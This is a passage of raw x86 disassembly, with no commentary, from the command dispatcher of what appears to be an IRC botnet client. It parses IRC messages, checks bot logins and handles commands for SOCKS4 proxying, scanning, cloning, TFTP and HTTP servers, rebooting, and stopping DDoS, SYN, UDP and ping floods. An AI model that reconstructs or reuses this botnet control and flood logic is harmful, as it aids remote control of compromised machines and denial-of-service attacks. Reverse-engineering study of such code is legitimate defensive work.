sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_409BCF: ; CODE XREF: sub_409806+3C2�j
test eax, eax
jnz loc_409A84
mov eax, [ebp+arg_20]
and dword ptr [eax], 0
jmp loc_4099D2
; ---------------------------------------------------------------------------
loc_409BE2: ; CODE XREF: sub_409806+2E1�j
mov edi, [ebp+var_A0]
push 5
mov esi, offset aNick ; "NICK"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_409DC2
mov eax, [ebp+var_9C]
or [ebp+var_1C], 0FFFFFFFFh
mov ebx, [ebp+arg_18]
inc eax
sub [ebp+var_1C], eax
mov [ebp+arg_0], eax
mov [ebp+var_20], 2
loc_409C15: ; CODE XREF: sub_409806+4A0�j
lea eax, [ebp+var_8DC]
mov esi, ebx
loc_409C1D: ; CODE XREF: sub_409806+433�j
mov dl, [esi]
mov cl, dl
cmp dl, [eax]
jnz short loc_409C3F
test cl, cl
jz short loc_409C3B
mov dl, [esi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_409C3F
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_409C1D
loc_409C3B: ; CODE XREF: sub_409806+421�j
xor eax, eax
jmp short loc_409C44
; ---------------------------------------------------------------------------
loc_409C3F: ; CODE XREF: sub_409806+41D�j
; sub_409806+42B�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_409C44: ; CODE XREF: sub_409806+437�j
test eax, eax
jnz short loc_409C9D
lea eax, [ebp+var_8DC]
push 21h
push eax
call sub_417E10
mov edi, eax
test edi, edi
pop ecx
pop ecx
jz short loc_409C9D
mov eax, [ebp+var_1C]
mov edx, [ebp+arg_0]
lea ecx, [ebx+2]
mov byte ptr [ebx], 3Ah
lea esi, [eax+ecx]
loc_409C6D: ; CODE XREF: sub_409806+46F�j
mov al, [edx]
mov [esi+edx], al
inc edx
test al, al
jnz short loc_409C6D
mov eax, edi
mov esi, edi
loc_409C7B: ; CODE XREF: sub_409806+47A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_409C7B
sub eax, esi
dec ecx
loc_409C85: ; CODE XREF: sub_409806+485�j
mov dl, [ecx+1]
inc ecx
test dl, dl
jnz short loc_409C85
mov edi, ecx
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_409C9D: ; CODE XREF: sub_409806+440�j
; sub_409806+456�j
add ebx, 80h
dec [ebp+var_20]
jnz loc_409C15
cmp [ebp+arg_0], 0
jz loc_409A84
mov esi, [ebp+arg_10]
lea eax, [ebp+var_F0]
loc_409CBF: ; CODE XREF: sub_409806+4D5�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_409CE1
test cl, cl
jz short loc_409CDD
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_409CE1
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_409CBF
loc_409CDD: ; CODE XREF: sub_409806+4C3�j
xor eax, eax
jmp short loc_409CE6
; ---------------------------------------------------------------------------
loc_409CE1: ; CODE XREF: sub_409806+4BF�j
; sub_409806+4CD�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_409CE6: ; CODE XREF: sub_409806+4D9�j
test eax, eax
jnz short loc_409CFF
push 0Fh
push [ebp+arg_0]
push [ebp+arg_10]
loc_409CF2: ; CODE XREF: sub_409806+242�j
call sub_4169C0
add esp, 0Ch
jmp loc_409A84
; ---------------------------------------------------------------------------
loc_409CFF: ; CODE XREF: sub_409806+4E2�j
mov edx, [ebp+arg_18]
xor edi, edi
loc_409D04: ; CODE XREF: sub_409806+540�j
cmp byte ptr [edx], 0
jz short loc_409D3C
lea eax, [ebp+var_8DC]
mov esi, edx
loc_409D11: ; CODE XREF: sub_409806+527�j
mov bl, [esi]
mov cl, bl
cmp bl, [eax]
jnz short loc_409D33
test cl, cl
jz short loc_409D2F
mov bl, [esi+1]
mov cl, bl
cmp bl, [eax+1]
jnz short loc_409D33
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_409D11
loc_409D2F: ; CODE XREF: sub_409806+515�j
xor eax, eax
jmp short loc_409D38
; ---------------------------------------------------------------------------
loc_409D33: ; CODE XREF: sub_409806+511�j
; sub_409806+51F�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_409D38: ; CODE XREF: sub_409806+52B�j
test eax, eax
jz short loc_409D4D
loc_409D3C: ; CODE XREF: sub_409806+501�j
inc edi
add edx, 80h
cmp edi, 2
jl short loc_409D04
jmp loc_409A84
; ---------------------------------------------------------------------------
loc_409D4D: ; CODE XREF: sub_409806+534�j
lea eax, [ebp+var_8DC]
push 21h
push eax
call sub_417E10
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz loc_409A84
mov ecx, [ebp+arg_0]
lea edx, [ecx+1]
loc_409D6D: ; CODE XREF: sub_409806+56C�j
mov al, [ecx]
inc ecx
test al, al
jnz short loc_409D6D
sub ecx, edx
mov edx, ebx
lea esi, [edx+1]
loc_409D7B: ; CODE XREF: sub_409806+57A�j
mov al, [edx]
inc edx
test al, al
jnz short loc_409D7B
sub edx, esi
add edx, ecx
cmp edx, 7Eh
ja loc_409A84
push ebx
push [ebp+arg_0]
shl edi, 7
add edi, [ebp+arg_18]
push offset aSS_3 ; ":%s%s"
push edi
call sub_416905
push 0
push 0
lea eax, [ebp+var_354]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_405D20
add esp, 24h
jmp loc_409A84
; ---------------------------------------------------------------------------
loc_409DC2: ; CODE XREF: sub_409806+3EE�j
mov edi, [ebp+var_A0]
mov ebx, offset aPart ; "PART"
push 5
mov esi, ebx
pop ecx
xor eax, eax
repe cmpsb
jz short loc_409DEC
mov edi, [ebp+var_A0]
push 5
mov esi, offset aQuit ; "QUIT"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_409E3C
loc_409DEC: ; CODE XREF: sub_409806+5D0�j
mov esi, [ebp+arg_18]
xor eax, eax
mov [ebp+var_10], esi
loc_409DF4: ; CODE XREF: sub_409806+634�j
cmp byte ptr [esi], 0
jz short loc_409E2A
mov edi, [ebp+var_A4]
loc_409DFF: ; CODE XREF: sub_409806+615�j
mov dl, [esi]
mov cl, dl
cmp dl, [edi]
jnz short loc_409E21
test cl, cl
jz short loc_409E1D
mov dl, [esi+1]
mov cl, dl
cmp dl, [edi+1]
jnz short loc_409E21
inc esi
inc esi
inc edi
inc edi
test cl, cl
jnz short loc_409DFF
loc_409E1D: ; CODE XREF: sub_409806+603�j
xor ecx, ecx
jmp short loc_409E26
; ---------------------------------------------------------------------------
loc_409E21: ; CODE XREF: sub_409806+5FF�j
; sub_409806+60D�j
sbb ecx, ecx
sbb ecx, 0FFFFFFFFh
loc_409E26: ; CODE XREF: sub_409806+619�j
test ecx, ecx
jz short loc_409E7F
loc_409E2A: ; CODE XREF: sub_409806+5F1�j
mov esi, [ebp+var_10]
inc eax
add esi, 80h
cmp eax, 2
mov [ebp+var_10], esi
jl short loc_409DF4
loc_409E3C: ; CODE XREF: sub_409806+5E4�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset a353 ; "353"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_409F00
mov esi, [ebp+var_94]
mov eax, [ebp+arg_8]
loc_409E5D: ; CODE XREF: sub_409806+673�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_409EDE
test cl, cl
jz short loc_409E7B
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_409EDE
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_409E5D
loc_409E7B: ; CODE XREF: sub_409806+661�j
xor eax, eax
jmp short loc_409EE3
; ---------------------------------------------------------------------------
loc_409E7F: ; CODE XREF: sub_409806+622�j
mov ecx, [ebp+arg_18]
shl eax, 7
and byte ptr [eax+ecx], 0
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_2F0]
push offset aMainUserSLog_0 ; "[MAIN]: User: %s logged out."
push eax
call sub_416905
lea eax, [ebp+var_2F0]
push eax
call sub_401ECD
mov edi, [ebp+var_A0]
add esp, 10h
push 5
mov esi, ebx
pop ecx
xor eax, eax
repe cmpsb
jnz loc_409A84
lea eax, [ebp+var_2F0]
push eax
mov eax, [ebp+var_A4]
inc eax
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
jmp loc_4099DD
; ---------------------------------------------------------------------------
loc_409EDE: ; CODE XREF: sub_409806+65D�j
; sub_409806+66B�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_409EE3: ; CODE XREF: sub_409806+677�j
test eax, eax
jnz short loc_409EF0
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_409EF0: ; CODE XREF: sub_409806+6DF�j
push [ebp+var_94]
push offset aMainJoinedChan ; "[MAIN]: Joined channel: %s."
jmp loc_40FA7C
; ---------------------------------------------------------------------------
loc_409F00: ; CODE XREF: sub_409806+648�j
mov edi, [ebp+var_A0]
mov eax, offset aPrivmsg ; "PRIVMSG"
push 8
xor edx, edx
mov esi, eax
pop ecx
repe cmpsb
mov edx, offset aNotice ; "NOTICE"
jz short loc_409F50
mov edi, [ebp+var_A0]
push 7
mov esi, edx
pop ecx
xor ebx, ebx
repe cmpsb
jz short loc_409F50
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_42A8E8
pop ecx
xor ebx, ebx
repe cmpsb
jnz loc_40F8C3
cmp dword_42FCC8, ebx
jz loc_40F8C3
loc_409F50: ; CODE XREF: sub_409806+713�j
; sub_409806+724�j
mov edi, [ebp+var_A0]
mov ebx, [ebp+var_20]
mov esi, eax
push 8
pop ecx
xor eax, eax
repe cmpsb
jz loc_40A055
mov edi, [ebp+var_A0]
push 7
mov esi, edx
pop ecx
xor eax, eax
repe cmpsb
jz loc_40A055
mov eax, [ebp+var_98]
inc [ebp+var_94]
mov [ebp+var_20], 4
mov [ebp+var_9C], eax
loc_409F96: ; CODE XREF: sub_409806+90D�j
; sub_409806+94C�j ...
mov ebx, [ebp+var_20]
shl ebx, 2
lea eax, [ebp+ebx+var_A4]
mov ecx, [eax]
lea edx, [ecx+1]
mov [eax], edx
mov al, byte_42FCD4
cmp [ecx], al
mov [ebp+var_BC], edx
jnz loc_409A84
push 6
mov edi, edx
mov esi, offset aLogin ; "login"
pop ecx
xor eax, eax
repe cmpsb
jz loc_40F8CB
push 2
mov edi, edx
mov esi, offset dword_42A8E4
pop ecx
xor eax, eax
repe cmpsb
jz loc_40F8CB
cmp [ebp+var_1C], eax
jnz short loc_40A002
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_42A8E8
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40F8C3
loc_40A002: ; CODE XREF: sub_409806+7E2�j
xor eax, eax
cmp [ebp+arg_28], eax
jnz loc_40F8C3
cmp dword_4301A0, eax
mov [ebp+var_10], eax
jle loc_40A317
mov [ebp+var_1C], offset dword_47FF38
loc_40A023: ; CODE XREF: sub_409806+997�j
mov edi, [ebp+var_1C]
mov esi, edx
loc_40A028: ; CODE XREF: sub_409806+846�j
mov cl, [edi]
mov al, cl
cmp cl, [esi]
jnz loc_40A181
test al, al
jz short loc_40A04E
mov cl, [edi+1]
mov al, cl
cmp cl, [esi+1]
jnz loc_40A181
inc edi
inc edi
inc esi
inc esi
test al, al
jnz short loc_40A028
loc_40A04E: ; CODE XREF: sub_409806+830�j
xor eax, eax
jmp loc_40A186
; ---------------------------------------------------------------------------
loc_40A055: ; CODE XREF: sub_409806+75C�j
; sub_409806+771�j
mov edi, [ebp+var_A0]
push 7
mov esi, edx
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40A06D
mov [ebp+var_4], 1
loc_40A06D: ; CODE XREF: sub_409806+85E�j
cmp [ebp+var_9C], 0
jz loc_409A84
push offset dword_42A8E0
push [ebp+var_9C]
call sub_4173D0
test eax, eax
pop ecx
pop ecx
jz short loc_40A096
cmp [ebp+var_4], 0
jz short loc_40A0A2
loc_40A096: ; CODE XREF: sub_409806+888�j
lea eax, [ebp+var_F0]
mov [ebp+var_9C], eax
loc_40A0A2: ; CODE XREF: sub_409806+88E�j
cmp [ebp+var_98], 0
jz loc_409A84
inc [ebp+var_98]
jz short loc_40A0F1
cmp [ebp+arg_10], 0
jz short loc_40A0F1
lea eax, [ebp+var_4BC]
lea edx, [eax+1]
loc_40A0C6: ; CODE XREF: sub_409806+8C5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40A0C6
sub eax, edx
push eax
push [ebp+var_98]
lea eax, [ebp+var_4BC]
push eax
call sub_418200
add esp, 0Ch
mov ebx, eax
neg ebx
sbb ebx, ebx
add ebx, 4
mov [ebp+var_20], ebx
loc_40A0F1: ; CODE XREF: sub_409806+8AF�j
; sub_409806+8B5�j
mov eax, ebx
shl eax, 2
mov edx, [ebp+eax+var_A4]
test edx, edx
jz loc_409A84
push 0Ah
mov edi, edx
mov esi, offset dword_42A8D4
pop ecx
xor ebx, ebx
repe cmpsb
jnz loc_409F96
mov esi, [ebp+var_9C]
mov bl, [esi]
cmp bl, 23h
jz short loc_40A144
mov ecx, dword_480AC4
mov ecx, off_42FDB8[ecx*4]
cmp byte ptr [ecx], 0
jz short loc_40A144
push ecx
push esi
push offset dword_42A8B8
jmp loc_4099DD
; ---------------------------------------------------------------------------
loc_40A144: ; CODE XREF: sub_409806+91E�j
; sub_409806+930�j
mov edi, edx
push 6
mov esi, offset dword_42A8B0
pop ecx
xor edx, edx
repe cmpsb
jnz loc_409F96
mov eax, [ebp+eax+var_A0]
test eax, eax
jz loc_409F96
cmp bl, 23h
jz loc_409F96
push eax
push [ebp+var_9C]
push offset dword_42A898
jmp loc_4099DD
; ---------------------------------------------------------------------------
loc_40A181: ; CODE XREF: sub_409806+828�j
; sub_409806+83A�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40A186: ; CODE XREF: sub_409806+84A�j
test eax, eax
jz short loc_40A1A8
inc [ebp+var_10]
mov eax, [ebp+var_10]
add [ebp+var_1C], 0B8h
cmp eax, dword_4301A0
jl loc_40A023
jmp loc_40A317
; ---------------------------------------------------------------------------
loc_40A1A8: ; CODE XREF: sub_409806+982�j
push offset asc_4285C8 ; " :"
push [ebp+arg_0]
call sub_4173D0
test eax, eax
pop ecx
pop ecx
jz loc_409A84
mov esi, [ebp+var_10]
mov cl, byte_42FCD4
imul esi, 0B8h
mov [eax+2], cl
mov cl, byte_42FCD4
mov [eax+3], cl
push 9Fh
lea ecx, dword_47FF50[esi]
push ecx
add eax, 4
push eax
call sub_4169C0
lea eax, dword_47FF38[esi]
lea edi, [ebp+ebx+var_64]
add esp, 0Ch
mov [ebp+var_10], 0Fh
mov [ebp+var_1C], eax
mov esi, edi
loc_40A208: ; CODE XREF: sub_409806+AA6�j
push [ebp+var_10]
lea eax, [ebp+var_C8]
push offset aD_1 ; "$%d-"
push eax
call sub_416905
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_4173D0
add esp, 14h
test eax, eax
jz short loc_40A271
cmp dword ptr [esi], 0
jz short loc_40A276
mov eax, [ebp+var_1C]
lea edx, [eax+1]
loc_40A23D: ; CODE XREF: sub_409806+A3C�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40A23D
sub eax, edx
add [ebp+var_14], eax
jz short loc_40A2A2
push dword ptr [esi-4]
push [ebp+var_14]
call sub_4173D0
test eax, eax
pop ecx
pop ecx
jz short loc_40A2A2
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_40718D
add esp, 0Ch
jmp short loc_40A2A2
; ---------------------------------------------------------------------------
loc_40A271: ; CODE XREF: sub_409806+A2A�j
cmp dword ptr [esi], 0
jnz short loc_40A2A2
loc_40A276: ; CODE XREF: sub_409806+A2F�j
push 2
lea eax, [ebp+var_C8]
push eax
lea eax, [ebp+var_24]
push eax
call sub_4169C0
and [ebp+var_22], 0
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_40718D
add esp, 18h
loc_40A2A2: ; CODE XREF: sub_409806+A43�j
; sub_409806+A54�j ...
dec [ebp+var_10]
sub esi, 4
cmp [ebp+var_10], 0
jg loc_40A208
mov [ebp+var_10], 10h
mov esi, edi
loc_40A2BB: ; CODE XREF: sub_409806+B02�j
push [ebp+var_10]
lea eax, [ebp+var_C8]
push offset aD_0 ; "$%d"
push eax
call sub_416905
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_4173D0
add esp, 14h
test eax, eax
jz short loc_40A2FE
mov eax, [esi]
test eax, eax
jz short loc_40A2FE
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_40718D
add esp, 0Ch
loc_40A2FE: ; CODE XREF: sub_409806+ADD�j
; sub_409806+AE3�j
dec [ebp+var_10]
sub esi, 4
cmp [ebp+var_10], 0
jg short loc_40A2BB
mov edx, [ebp+var_BC]
mov [ebp+var_8], 1
loc_40A317: ; CODE XREF: sub_409806+810�j
; sub_409806+99D�j
mov al, byte_42FCD4
cmp [edx], al
jz short loc_40A32A
cmp [ebp+var_8], 0
jz loc_40A506
loc_40A32A: ; CODE XREF: sub_409806+B18�j
push [ebp+arg_10]
mov edi, [ebp+arg_0]
push offset aMe ; "$me"
push edi
call sub_40718D
lea eax, [ebp+var_F0]
push eax
push offset aUser_2 ; "$user"
push edi
call sub_40718D
push [ebp+var_9C]
push offset aChan ; "$chan"
push edi
call sub_40718D
push 0
push 0
lea eax, [ebp+var_C8]
push 2
push eax
call sub_411098
push eax
push offset aRndnick_0 ; "$rndnick"
push edi
call sub_40718D
add esp, 40h
push [ebp+arg_14]
push offset aServer_1 ; "$server"
push edi
call sub_40718D
mov esi, offset aChr ; "$chr("
push esi
push edi
call sub_4173D0
add esp, 14h
jmp loc_40A48A
; ---------------------------------------------------------------------------
loc_40A3A1: ; CODE XREF: sub_409806+C86�j
push esi
push [ebp+arg_0]
call sub_4173D0
mov [ebp+var_BC], eax
add eax, 5
push 4
push eax
lea eax, [ebp+var_C8]
push eax
call sub_4169C0
lea eax, [ebp+var_C8]
push offset asc_42A858 ; ")"
push eax
call sub_417779
add esp, 1Ch
cmp [ebp+var_C8], 30h
jl short loc_40A3E8
cmp [ebp+var_C8], 39h
jle short loc_40A3FE
loc_40A3E8: ; CODE XREF: sub_409806+BD7�j
push 3
lea eax, [ebp+var_C8]
push offset a63 ; "63"
push eax
call sub_4169C0
add esp, 0Ch
loc_40A3FE: ; CODE XREF: sub_409806+BE0�j
lea eax, [ebp+var_C8]
push eax
call sub_416C92
test eax, eax
pop ecx
jle short loc_40A421
lea eax, [ebp+var_C8]
push eax
call sub_416C92
pop ecx
mov [ebp+var_24], al
jmp short loc_40A432
; ---------------------------------------------------------------------------
loc_40A421: ; CODE XREF: sub_409806+C07�j
call sub_41699A
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+var_24], dl
loc_40A432: ; CODE XREF: sub_409806+C19�j
and [ebp+var_23], 0
lea eax, [ebp+var_C8]
lea edx, [eax+1]
loc_40A43F: ; CODE XREF: sub_409806+C3E�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40A43F
sub eax, edx
mov ecx, eax
xor eax, eax
lea edi, [ebp+var_C8]
stosd
stosd
add ecx, 6
push ecx
push [ebp+var_BC]
stosd
lea eax, [ebp+var_C8]
push eax
call sub_4169C0
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_40718D
push esi
push [ebp+arg_0]
call sub_4173D0
add esp, 20h
loc_40A48A: ; CODE XREF: sub_409806+B96�j
test eax, eax
jnz loc_40A3A1
mov esi, 1FFh
push esi
push [ebp+arg_0]
lea eax, [ebp+var_21F0]
push eax
call sub_4169C0
push esi
lea eax, [ebp+var_21F0]
push eax
lea eax, [ebp+var_23F0]
push eax
call sub_4169C0
mov esi, offset asc_422B08 ; " "
lea eax, [ebp+var_23F0]
push esi
push eax
call sub_417779
xor edi, edi
add esp, 20h
mov [ebp+var_A4], eax
inc edi
loc_40A4D9: ; CODE XREF: sub_409806+CE8�j
push esi
push 0
call sub_417779
mov [ebp+edi*4+var_A4], eax
inc edi
cmp edi, 20h
pop ecx
pop ecx
jl short loc_40A4D9
lea eax, [ebp+ebx+var_A4]
mov ecx, [eax]
test ecx, ecx
jz loc_409A84
add ecx, 3
mov [eax], ecx
loc_40A506: ; CODE XREF: sub_409806+B1E�j
mov eax, [ebp+ebx+var_A4]
push 8
mov edi, eax
mov esi, offset aRndnick ; "rndnick"
pop ecx
xor edx, edx
repe cmpsb
mov [ebp+var_1C], eax
jz loc_40F876
push 3
mov edi, eax
mov esi, offset aRn ; "rn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F876
push 4
mov edi, eax
mov esi, offset aDie ; "die"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EE19
push 2
mov edi, eax
mov esi, offset aD ; "d"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EE19
push 7
mov edi, eax
mov esi, offset aLogout ; "logout"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ED2B
push 3
mov edi, eax
mov esi, offset aLo ; "lo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ED2B
push 8
mov edi, eax
mov esi, offset aVersion ; "version"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ED0D
push 4
mov edi, eax
mov esi, offset aVer ; "ver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ED0D
push 7
mov edi, eax
mov esi, offset aSecure ; "secure"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EC0E
push 4
mov edi, eax
mov esi, offset aSec ; "sec"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EC0E
push 9
mov edi, eax
mov esi, offset aUnsecure ; "unsecure"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EC0E
push 6
mov edi, eax
mov esi, offset aUnsec ; "unsec"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EC0E
push 7
mov edi, eax
mov esi, offset aSocks4 ; "socks4"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EAE9
push 3
mov edi, eax
mov esi, offset aS4 ; "s4"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EAE9
push 0Bh
mov edi, eax
mov esi, offset aSocks4stop ; "socks4stop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A650
push [ebp+ebx+var_A0]
push 12h
push offset aServer_0 ; "Server"
push offset aSocks4_0 ; "[SOCKS4]"
jmp loc_40EACD
; ---------------------------------------------------------------------------
loc_40A650: ; CODE XREF: sub_409806+E30�j
push 0Bh
mov edi, eax
mov esi, offset aRloginstop ; "rloginstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A678
push [ebp+ebx+var_A0]
push 7
push offset aServer_0 ; "Server"
push offset aRlogind ; "[RLOGIND]"
jmp loc_40EACD
; ---------------------------------------------------------------------------
loc_40A678: ; CODE XREF: sub_409806+E58�j
push 9
mov edi, eax
mov esi, offset aHttpstop ; "httpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A6A0
push [ebp+ebx+var_A0]
push 4
push offset aServer_0 ; "Server"
push offset aHttpd ; "[HTTPD]"
jmp loc_40EACD
; ---------------------------------------------------------------------------
loc_40A6A0: ; CODE XREF: sub_409806+E80�j
push 8
mov edi, eax
mov esi, offset aLogstop ; "logstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A6C8
push [ebp+ebx+var_A0]
push 1Dh
push offset aLogList ; "Log list"
push offset aLog ; "[LOG]"
jmp loc_40EACD
; ---------------------------------------------------------------------------
loc_40A6C8: ; CODE XREF: sub_409806+EA8�j
push 0Dh
mov edi, eax
mov esi, offset aRedirectstop ; "redirectstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A6F0
push [ebp+ebx+var_A0]
push 11h
push offset aTcpRedirect ; "TCP redirect"
push offset aRedirect_0 ; "[REDIRECT]"
jmp loc_40EACD
; ---------------------------------------------------------------------------
loc_40A6F0: ; CODE XREF: sub_409806+ED0�j
push 0Ah
mov edi, eax
mov esi, offset aDdos_stop ; "ddos.stop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A718
push [ebp+ebx+var_A0]
push 0Bh
push offset aDdosFlood ; "DDoS flood"
push offset aDdos ; "[DDoS]"
jmp loc_40EACD
; ---------------------------------------------------------------------------
loc_40A718: ; CODE XREF: sub_409806+EF8�j
push 8
mov edi, eax
mov esi, offset aSynstop ; "synstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A740
push [ebp+ebx+var_A0]
push 0Ch
push offset aSynFlood ; "Syn flood"
push offset aSyn_0 ; "[SYN]"
jmp loc_40EACD
; ---------------------------------------------------------------------------
loc_40A740: ; CODE XREF: sub_409806+F20�j
push 8
mov edi, eax
mov esi, offset aUdpstop ; "udpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A768
push [ebp+ebx+var_A0]
push 10h
push offset aUdpFlood ; "UDP flood"
push offset aUpd ; "[UPD]"
jmp loc_40EACD
; ---------------------------------------------------------------------------
loc_40A768: ; CODE XREF: sub_409806+F48�j
push 9
mov edi, eax
mov esi, offset aPingstop ; "pingstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A790
push [ebp+ebx+var_A0]
push 0Fh
push offset aPingFlood ; "Ping flood"
push offset aPing_1 ; "[PING]"
jmp loc_40EACD
; ---------------------------------------------------------------------------
loc_40A790: ; CODE XREF: sub_409806+F70�j
push 9
mov edi, eax
mov esi, offset aTftpstop ; "tftpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A7B8
push [ebp+ebx+var_A0]
push 5
push offset aServer_0 ; "Server"
push offset aTftp_0 ; "[TFTP]"
jmp loc_40EACD
; ---------------------------------------------------------------------------
loc_40A7B8: ; CODE XREF: sub_409806+F98�j
push 0Dh
mov edi, eax
mov esi, offset aFindfilestop ; "findfilestop"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EABA
push 7
mov edi, eax
mov esi, offset aFfstop ; "ffstop"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EABA
push 0Ah
mov edi, eax
mov esi, offset aProcsstop ; "procsstop"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EAA5
push 7
mov edi, eax
mov esi, offset aPsstop ; "psstop"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EAA5
push 0Ah
mov edi, eax
mov esi, offset aClonestop ; "clonestop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A830
push [ebp+ebx+var_A0]
push 18h
push offset aClone ; "Clone"
push offset aClones ; "[CLONES]"
jmp loc_40EACD
; ---------------------------------------------------------------------------
loc_40A830: ; CODE XREF: sub_409806+1010�j
push 0Bh
mov edi, eax
mov esi, offset aSecurestop ; "securestop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A858
push [ebp+ebx+var_A0]
push 1Ah
push offset aSecure_0 ; "Secure"
push offset aSecure_1 ; "[SECURE]"
jmp loc_40EACD
; ---------------------------------------------------------------------------
loc_40A858: ; CODE XREF: sub_409806+1038�j
push 9
mov edi, eax
mov esi, offset aScanstop ; "scanstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A880
push [ebp+ebx+var_A0]
push 9
push offset aScan_1 ; "Scan"
push offset aScan_0 ; "[SCAN]"
jmp loc_40EACD
; ---------------------------------------------------------------------------
loc_40A880: ; CODE XREF: sub_409806+1060�j
push 0Ah
mov edi, eax
mov esi, offset aScanstats ; "scanstats"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EA8C
push 6
mov edi, eax
loc_40A898: ; DATA XREF: .text:0043193C�o
; .text:00431980�o ...
mov esi, offset aStats ; "stats"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EA8C
push 0Ah
mov edi, eax
mov esi, offset aReconnect ; "reconnect"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EA6B
push 2
mov edi, eax
mov esi, offset aR ; "r"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EA6B
push 0Bh
mov edi, eax
mov esi, offset aDisconnect ; "disconnect"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EA49
push 3
mov edi, eax
mov esi, offset aDc ; "dc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EA49
push 5
mov edi, eax
mov esi, offset aQuit_0 ; "quit"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E9FF
push 2
mov edi, eax
mov esi, offset aQ ; "q"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E9FF
push 7
mov edi, eax
mov esi, offset aStatus ; "status"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E9C0
push 2
mov edi, eax
mov esi, offset aS_9 ; "s"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E9C0
push 3
mov edi, eax
mov esi, offset aId ; "id"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E988
push 2
mov edi, eax
mov esi, offset aI_0 ; "i"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E988
push 7
mov edi, eax
mov esi, offset aReboot ; "reboot"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40A9C2
call sub_407512
test eax, eax
mov eax, offset aMainRebootingS ; "[MAIN]: Rebooting system."
jnz short loc_40A993
mov eax, offset aMainFailedToRe ; "[MAIN]: Failed to reboot system."
loc_40A993: ; CODE XREF: sub_409806+1186�j
push eax
lea eax, [ebp+var_2F0]
push eax
call sub_416905
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
add esp, 1Ch
